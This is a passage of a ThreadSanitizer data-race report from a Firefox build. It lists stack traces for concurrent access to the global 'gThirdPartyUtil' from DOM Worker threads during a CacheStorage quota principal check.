    #10 mozilla::dom::WorkerGlobalScope_Binding::get_caches(JSContext*, JS::Handle&lt;JSObject*&gt;, void*, JSJitGetterCallArgs) /builds/worker/workspace/obj-build/dom/bindings/WorkerGlobalScopeBinding.cpp:2024:86 (libxul.so+0x38dae89) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #11 bool mozilla::dom::binding_detail::GenericGetter&lt;mozilla::dom::binding_detail::MaybeGlobalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3169:13 (libxul.so+0x3d636dd) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #12 CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:458:13 (libxul.so+0x96f531f) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #13 js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:546:12 (libxul.so+0x96f531f)
    #14 InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:613:10 (libxul.so+0x96f611c) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #15 js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:645:8 (libxul.so+0x96f611c)
    #16 js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:774:10 (libxul.so+0x96f6ed5) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #17 CallGetter /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:1974:12 (libxul.so+0x8972275) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #18 GetExistingProperty&lt;js::CanGC&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2002:12 (libxul.so+0x8972275)
    #19 NativeGetPropertyInline&lt;js::CanGC&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2150:14 (libxul.so+0x8972275)
    #20 js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2181:10 (libxul.so+0x8972275)
    #21 GetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:118:10 (libxul.so+0x96f96a9) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #22 GetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:125:10 (libxul.so+0x96f96a9)
    #23 js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:4719:10 (libxul.so+0x96f96a9)
    #24 GetPropertyOperation /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:244:10 (libxul.so+0x96e7694) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #25 Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3029:12 (libxul.so+0x96e7694)
    #26 js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:430:13 (libxul.so+0x96de514) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #27 js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, js::AbstractFramePtr, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:824:13 (libxul.so+0x96f7272) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #28 js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:856:10 (libxul.so+0x96f7439) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #29 EvaluateSourceBuffer&lt;mozilla::Utf8Unit&gt; /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:584:10 (libxul.so+0x886a41c) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #30 JS::Evaluate(JSContext*, JS::ReadOnlyCompileOptions const&amp;, JS::SourceText&lt;mozilla::Utf8Unit&gt;&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:592:10 (libxul.so+0x886a41c)
    #31 EvaluateSourceBuffer&lt;mozilla::Utf8Unit&gt; /builds/worker/checkouts/gecko/dom/workers/ScriptLoader.cpp:419:10 (libxul.so+0x563c12e) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #32 mozilla::dom::workerinternals::loader::WorkerScriptLoader::EvaluateScript(JSContext*, JS::loader::ScriptLoadRequest*) /builds/worker/checkouts/gecko/dom/workers/ScriptLoader.cpp:956:13 (libxul.so+0x563c12e)
    #33 mozilla::dom::workerinternals::loader::WorkerScriptLoader::ProcessPendingRequests(JSContext*) /builds/worker/checkouts/gecko/dom/workers/ScriptLoader.cpp:628:10 (libxul.so+0x563bd44) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #34 mozilla::dom::workerinternals::loader::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::WorkerPrivate*) /builds/worker/checkouts/gecko/dom/workers/ScriptLoader.cpp:1076:24 (libxul.so+0x563e853) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #35 mozilla::dom::WorkerRunnable::Run() /builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp:377:12 (libxul.so+0x56723f2) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #36 nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1199:16 (libxul.so+0x11db178) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #37 NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10 (libxul.so+0x11e1645) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #38 mozilla::dom::WorkerPrivate::RunCurrentSyncLoop() /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:4200:7 (libxul.so+0x56680c6) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #39 mozilla::dom::AutoSyncLoopHolder::Run() /builds/worker/workspace/obj-build/dist/include/mozilla/dom/WorkerPrivate.h:1504:27 (libxul.so+0x43b25c7) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #40 mozilla::dom::workerinternals::(anonymous namespace)::LoadAllScripts(mozilla::dom::WorkerPrivate*, mozilla::UniquePtr&lt;mozilla::dom::SerializedStackHolder, mozilla::DefaultDelete&lt;mozilla::dom::SerializedStackHolder&gt; &gt;, nsTArray&lt;nsTString&lt;char16_t&gt; &gt; const&amp;, bool, mozilla::dom::WorkerScriptType, mozilla::ErrorResult&amp;, mozilla::Encoding const*) /builds/worker/checkouts/gecko/dom/workers/ScriptLoader.cpp:262:14 (libxul.so+0x563f219) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #41 mozilla::dom::workerinternals::LoadMainScript(mozilla::dom::WorkerPrivate*, mozilla::UniquePtr&lt;mozilla::dom::SerializedStackHolder, mozilla::DefaultDelete&lt;mozilla::dom::SerializedStackHolder&gt; &gt;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::WorkerScriptType, mozilla::ErrorResult&amp;, mozilla::Encoding const*) /builds/worker/checkouts/gecko/dom/workers/ScriptLoader.cpp:1215:3 (libxul.so+0x563eeac) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #42 mozilla::dom::(anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::WorkerPrivate*) /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:380:5 (libxul.so+0x567f8a7) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #43 mozilla::dom::WorkerRunnable::Run() /builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp:377:12 (libxul.so+0x56723f2) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #44 nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1199:16 (libxul.so+0x11db178) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #45 NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10 (libxul.so+0x11e1645) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #46 mozilla::dom::WorkerPrivate::DoRunLoop(JSContext*) /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:3204:7 (libxul.so+0x5662d29) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #47 mozilla::dom::workerinternals::(anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:2042:42 (libxul.so+0x564d043) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #48 nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1199:16 (libxul.so+0x11db178) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #49 NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10 (libxul.so+0x11e1645) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #50 mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300:20 (libxul.so+0x1e471de) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #51 RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:381:10 (libxul.so+0x1d64d9c) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #52 RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374:3 (libxul.so+0x1d64d9c)
    #53 MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356:3 (libxul.so+0x1d64d9c)
    #54 nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:384:10 (libxul.so+0x11d6536) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #55 _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5 (libnspr4.so+0x4615d) (BuildId: 1c90f7fc05ccccdc86ccc4366be2a66c20feacf7)
  Previous write of size 8 at 0x7f2d10df5c28 by thread T24:
    #0 swap /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:822:10 (libxul.so+0x1219e71) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #1 XPCOMService_GetThirdPartyUtil /builds/worker/workspace/obj-build/xpcom/build/Services.cpp:467:8 (libxul.so+0x1219e71)
    #2 xpcom::services::get_ThirdPartyUtil::hc14c5b99fc9b0511 /builds/worker/workspace/obj-build/xpcom/build/services.rs:173:43 (libxul.so+0x9d14f58) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #3 mozurl::get_base_domain::h344f0f5988d19466 /builds/worker/checkouts/gecko/netwerk/base/mozurl/src/lib.rs:319:36 (libxul.so+0x9d14f58)
    #4 mozurl_base_domain /builds/worker/checkouts/gecko/netwerk/base/mozurl/src/lib.rs:358:15 (libxul.so+0x9d14f58)
    #5 BaseDomain /builds/worker/workspace/obj-build/dist/include/mozilla/net/MozURL.h:76:12 (libxul.so+0x5000d56) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #6 mozilla::dom::quota::QuotaManager::IsPrincipalInfoValid(mozilla::ipc::PrincipalInfo const&amp;) /builds/worker/checkouts/gecko/dom/quota/ActorsParent.cpp:6834:21 (libxul.so+0x5000d56)
    #7 BaseDomain /builds/worker/workspace/obj-build/dist/include/mozilla/net/MozURL.h:76:12 (libxul.so+0x5000d56) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #8 mozilla::dom::quota::QuotaManager::IsPrincipalInfoValid(mozilla::ipc::PrincipalInfo const&amp;) /builds/worker/checkouts/gecko/dom/quota/ActorsParent.cpp:6834:21 (libxul.so+0x5000d56)
    #9 mozilla::dom::cache::CacheStorage::CreateOnWorker(mozilla::dom::cache::Namespace, nsIGlobalObject*, mozilla::dom::WorkerPrivate*, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/cache/CacheStorage.cpp:195:3 (libxul.so+0x3d96b4b) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #10 mozilla::dom::WorkerGlobalScope::GetCaches(mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/workers/WorkerScope.cpp:439:21 (libxul.so+0x5675d9c) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #11 mozilla::dom::WorkerGlobalScope_Binding::get_caches(JSContext*, JS::Handle&lt;JSObject*&gt;, void*, JSJitGetterCallArgs) /builds/worker/workspace/obj-build/dom/bindings/WorkerGlobalScopeBinding.cpp:2024:86 (libxul.so+0x38dae89) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #12 bool mozilla::dom::binding_detail::GenericGetter&lt;mozilla::dom::binding_detail::MaybeGlobalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3169:13 (libxul.so+0x3d636dd) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #13 CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:458:13 (libxul.so+0x96f531f) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #14 js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:546:12 (libxul.so+0x96f531f)
    #15 InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:613:10 (libxul.so+0x96f611c) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #16 js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:645:8 (libxul.so+0x96f611c)
    #17 js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:774:10 (libxul.so+0x96f6ed5) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #18 CallGetter /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:1974:12 (libxul.so+0x8972275) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #19 GetExistingProperty&lt;js::CanGC&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2002:12 (libxul.so+0x8972275)
    #20 NativeGetPropertyInline&lt;js::CanGC&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2150:14 (libxul.so+0x8972275)
    #21 js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2181:10 (libxul.so+0x8972275)
    #22 GetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:118:10 (libxul.so+0x96f96a9) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #23 GetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:125:10 (libxul.so+0x96f96a9)
    #24 js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:4719:10 (libxul.so+0x96f96a9)
    #25 GetPropertyOperation /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:244:10 (libxul.so+0x96e7694) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #26 Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3029:12 (libxul.so+0x96e7694)
    #27 js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:430:13 (libxul.so+0x96de514) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #28 js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, js::AbstractFramePtr, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:824:13 (libxul.so+0x96f7272) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #29 js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:856:10 (libxul.so+0x96f7439) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #30 EvaluateSourceBuffer&lt;mozilla::Utf8Unit&gt; /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:584:10 (libxul.so+0x886a41c) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #31 JS::Evaluate(JSContext*, JS::ReadOnlyCompileOptions const&amp;, JS::SourceText&lt;mozilla::Utf8Unit&gt;&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:592:10 (libxul.so+0x886a41c)
    #32 EvaluateSourceBuffer&lt;mozilla::Utf8Unit&gt; /builds/worker/checkouts/gecko/dom/workers/ScriptLoader.cpp:419:10 (libxul.so+0x563c12e) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #33 mozilla::dom::workerinternals::loader::WorkerScriptLoader::EvaluateScript(JSContext*, JS::loader::ScriptLoadRequest*) /builds/worker/checkouts/gecko/dom/workers/ScriptLoader.cpp:956:13 (libxul.so+0x563c12e)
    #34 mozilla::dom::workerinternals::loader::WorkerScriptLoader::ProcessPendingRequests(JSContext*) /builds/worker/checkouts/gecko/dom/workers/ScriptLoader.cpp:628:10 (libxul.so+0x563bd44) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #35 mozilla::dom::workerinternals::loader::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::WorkerPrivate*) /builds/worker/checkouts/gecko/dom/workers/ScriptLoader.cpp:1076:24 (libxul.so+0x563e853) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #36 mozilla::dom::WorkerRunnable::Run() /builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp:377:12 (libxul.so+0x56723f2) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #37 nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1199:16 (libxul.so+0x11db178) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #38 NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10 (libxul.so+0x11e1645) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #39 mozilla::dom::WorkerPrivate::RunCurrentSyncLoop() /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:4200:7 (libxul.so+0x56680c6) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #40 mozilla::dom::AutoSyncLoopHolder::Run() /builds/worker/workspace/obj-build/dist/include/mozilla/dom/WorkerPrivate.h:1504:27 (libxul.so+0x43b25c7) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #41 mozilla::dom::workerinternals::(anonymous namespace)::LoadAllScripts(mozilla::dom::WorkerPrivate*, mozilla::UniquePtr&lt;mozilla::dom::SerializedStackHolder, mozilla::DefaultDelete&lt;mozilla::dom::SerializedStackHolder&gt; &gt;, nsTArray&lt;nsTString&lt;char16_t&gt; &gt; const&amp;, bool, mozilla::dom::WorkerScriptType, mozilla::ErrorResult&amp;, mozilla::Encoding const*) /builds/worker/checkouts/gecko/dom/workers/ScriptLoader.cpp:262:14 (libxul.so+0x563f219) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #42 mozilla::dom::workerinternals::LoadMainScript(mozilla::dom::WorkerPrivate*, mozilla::UniquePtr&lt;mozilla::dom::SerializedStackHolder, mozilla::DefaultDelete&lt;mozilla::dom::SerializedStackHolder&gt; &gt;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::WorkerScriptType, mozilla::ErrorResult&amp;, mozilla::Encoding const*) /builds/worker/checkouts/gecko/dom/workers/ScriptLoader.cpp:1215:3 (libxul.so+0x563eeac) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #43 mozilla::dom::(anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::WorkerPrivate*) /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:380:5 (libxul.so+0x567f8a7) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #44 mozilla::dom::WorkerRunnable::Run() /builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp:377:12 (libxul.so+0x56723f2) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #45 nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1199:16 (libxul.so+0x11db178) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #46 NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10 (libxul.so+0x11e1645) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #47 mozilla::dom::WorkerPrivate::DoRunLoop(JSContext*) /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:3204:7 (libxul.so+0x5662d29) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #48 mozilla::dom::workerinternals::(anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:2042:42 (libxul.so+0x564d043) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #49 nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1199:16 (libxul.so+0x11db178) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #50 NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10 (libxul.so+0x11e1645) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #51 mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300:20 (libxul.so+0x1e471de) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #52 RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:381:10 (libxul.so+0x1d64d9c) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #53 RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374:3 (libxul.so+0x1d64d9c)
    #54 MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356:3 (libxul.so+0x1d64d9c)
    #55 nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:384:10 (libxul.so+0x11d6536) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #56 _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5 (libnspr4.so+0x4615d) (BuildId: 1c90f7fc05ccccdc86ccc4366be2a66c20feacf7)
  Location is global 'gThirdPartyUtil' of size 8 at 0x7f2d10df5c28 (libxul.so+0xe1f5c28)
  Thread T26 'DOM Worker' (tid=2834988, running) created by main thread at:
    #0 pthread_create /builds/worker/fetches/llvm-project/compiler-rt/lib/tsan/rtl/tsan_interceptors_posix.cpp:1022:3 (firefox+0x5dfdd) (BuildId: 1cc3162b5b2142f42fb41fc71067f0763f9ef4a6)
    #1 _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458:14 (libnspr4.so+0x3d1b5) (BuildId: 1c90f7fc05ccccdc86ccc4366be2a66c20feacf7)
    #2 PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533:12 (libnspr4.so+0x322a5) (BuildId: 1c90f7fc05ccccdc86ccc4366be2a66c20feacf7)
    #3 nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:618:18 (libxul.so+0x11d80b5) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #4 mozilla::dom::WorkerThread::Create(mozilla::dom::WorkerThreadFriendKey const&amp;) /builds/worker/checkouts/gecko/dom/workers/WorkerThread.cpp:102:7 (libxul.so+0x567c9b1) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #5 mozilla::dom::workerinternals::RuntimeService::ScheduleWorker(mozilla::dom::WorkerPrivate&amp;) /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1323:37 (libxul.so+0x5636872) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #6 mozilla::dom::workerinternals::RuntimeService::RegisterWorker(mozilla::dom::WorkerPrivate&amp;) /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1205:19 (libxul.so+0x5635d5d) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #7 mozilla::dom::WorkerPrivate::Constructor(JSContext*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::dom::WorkerKind, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, mozilla::dom::WorkerLoadInfo*, mozilla::ErrorResult&amp;, nsTString&lt;char16_t&gt;) /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2587:24 (libxul.so+0x565feb5) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #8 mozilla::dom::Worker::Constructor(mozilla::dom::GlobalObject const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::WorkerOptions const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/workers/Worker.cpp:43:41 (libxul.so+0x563f4fe) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #9 mozilla::dom::Worker_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/obj-build/dom/bindings/WorkerBinding.cpp:1115:52 (libxul.so+0x38c94ed) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #10 CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:458:13 (libxul.so+0x96f6a21) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #11 CallJSNativeConstructor /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:474:8 (libxul.so+0x96f6a21)
    #12 InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:693:10 (libxul.so+0x96f6a21)
    #13 ConstructFromStack /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:721:10 (libxul.so+0x96eb1fe) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
    #14 Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3359:16 (libxul.so+0x96eb1fe)
    #15 js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:430:13 (libxul.so+0x96de514) (BuildId: 258975982a4c462af763ad71fac49e6c2ab4c945)
